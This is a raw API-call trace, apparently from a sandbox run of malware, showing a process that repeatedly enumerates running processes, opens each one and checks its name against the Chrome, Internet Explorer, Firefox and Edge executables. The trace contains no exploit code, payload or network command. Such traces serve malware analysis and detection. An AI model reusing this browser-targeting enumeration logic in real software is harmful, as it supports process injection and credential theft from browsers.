	[0250.697] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0xa03c
	[0250.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.697] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0250.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.697] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.698] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0250.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.698] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.698] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0250.699] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0xa040
	[0250.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.699] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.700] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.700] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.701] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.701] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0250.702] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0xa044
	[0250.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.702] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0250.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.702] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.702] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0250.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.702] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.703] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.703] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0xa048
	[0250.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.703] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.704] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.704] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.704] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.705] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0250.705] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0xa04c
	[0250.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.706] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0250.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.706] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.706] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0250.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.706] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.706] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0250.707] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0xa050
	[0250.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.707] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.708] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.709] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.709] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.709] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0250.710] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0xa054
	[0250.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.710] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0250.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.710] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.711] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0250.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.711] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.711] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0250.712] CloseHandle (hObject=0x4fd0) returned 1
	[0250.712] Sleep (dwMilliseconds=0x64) 
	[0250.818] GetCurrentProcessId () returned 0x110
	[0250.818] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0250.823] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0250.824] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0250.826] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0250.828] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xa058
	[0250.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.828] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0250.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.829] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.830] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0250.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.830] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.831] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0250.833] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xa05c
	[0250.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.833] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0250.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.834] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.834] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0250.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.834] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.835] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0250.835] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xa060
	[0250.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.835] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0250.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.836] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.836] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0250.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.837] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.837] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0250.837] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xa064
	[0250.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.838] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0250.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.838] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.838] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0250.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.839] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.839] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0250.839] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xa068
	[0250.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.840] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0250.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.840] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.840] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0250.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.841] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.841] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0250.842] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xa06c
	[0250.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.842] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0250.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.842] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.842] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0250.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.843] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.843] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0250.844] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xa070
	[0250.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.844] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0250.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.844] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.844] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0250.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.845] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.845] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0250.846] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xa074
	[0250.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.846] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0250.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.846] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.846] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0250.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.847] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.847] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.847] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xa078
	[0250.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.848] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.848] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.849] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.849] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.849] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.850] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xa07c
	[0250.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.850] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.851] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.851] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.851] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.852] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.852] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xa080
	[0250.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.853] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.853] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.853] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.854] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.854] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.854] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xa084
	[0250.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.855] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.855] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.855] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.856] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.856] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.857] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xa088
	[0250.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.857] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.857] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.857] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.858] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.858] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.859] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xa08c
	[0250.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.859] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.859] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.859] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.860] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.860] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.861] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xa090
	[0250.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.861] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.861] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.862] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.862] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.862] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0250.863] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xa094
	[0250.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.863] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0250.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.863] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.864] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0250.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.864] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.865] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.865] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xa098
	[0250.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.866] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.866] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.866] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.867] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.867] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
